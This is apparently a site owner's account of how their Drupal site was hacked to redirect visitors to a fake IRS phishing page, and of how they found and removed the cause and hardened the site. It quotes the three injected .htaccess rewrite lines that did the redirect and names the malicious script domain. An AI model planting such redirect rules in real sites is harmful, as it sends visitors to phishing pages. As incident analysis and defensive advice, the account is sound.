We noticed something was wrong when a user messaged us saying our website was redirecting them to what looked like a fake government site. We checked. It was.
This is what happened next, in precise detail — because we couldn't find a clear account of this specific type of hack when it was happening to us, and we want this to be useful to anyone else in the same situation.
What the hack looked like
Anyone visiting umamicasa.com was being silently redirected to a domain called gov-lrs.theleaftable.com/irs — a fake IRS-lookalike phishing site. The redirect was happening server-side, which meant it affected all visitors regardless of browser or device.
A scan via Sucuri SiteCheck confirmed two issues: a redirect hack and a malicious JavaScript injection from cdn.jsinit.directfwd.com. Google Safe Browsing hadn't flagged us yet, which meant we hadn't lost search rankings — but we would have, quickly, if we hadn't acted.
Finding the malicious code
We logged into GoDaddy cPanel and opened File Manager. The first thing we looked for was recently modified files — the date column in File Manager shows you exactly when each file was last changed. The .htaccess file in public_html had been modified on a date we didn't recognise.
We opened it. Lines 11, 12, and 13 were the problem:
RewriteCond %{HTTP_HOST} ^umamicasa\.com$ [OR]
RewriteCond %{HTTP_HOST} ^www\.umamicasa\.com$
RewriteRule ^/?$ "https://gov-lrs.theleaftable.com/irs" [R=301,L]
Three lines. That's all it took to redirect every visitor to a phishing site.
How it got there
The most likely explanation: an outdated Drupal module with a known vulnerability. The attacker found the vulnerability via automated scanning, used it to get write access to the filesystem, and added those three lines to .htaccess. The entire operation probably took them less than two minutes.
This is how most website hacks work. It's not targeted. It's automated. Bots scan the internet for known vulnerabilities and exploit them at scale. Your website isn't special to the attacker — it's just one of thousands they compromised that week.
What we did after removing the malware
Changed all passwords immediately — GoDaddy account, cPanel, CMS admin, database. Updated all CMS modules and core to their latest versions. Set up Cloudflare (free tier) as a firewall layer in front of the site. Scheduled weekly Sucuri scans.
We also moved the site off Drupal entirely — not because Drupal is insecure, but because a static HTML site has a dramatically smaller attack surface. There's no CMS to exploit, no database to inject, no plugin vulnerabilities to scan for.
The GoDaddy upsell, and why we ignored it
When we contacted GoDaddy support about the hack, the agent immediately pivoted to selling us a ₹16,740 "web security plan." We declined. The fix — deleting three lines from a file — was free and took twenty minutes. The upsell was real money for a problem we could solve ourselves with basic file manager access.
We're not saying security tools have no value. We're saying that for a small site with a specific, identified problem, the first step is always to understand what you're dealing with before spending money on a solution.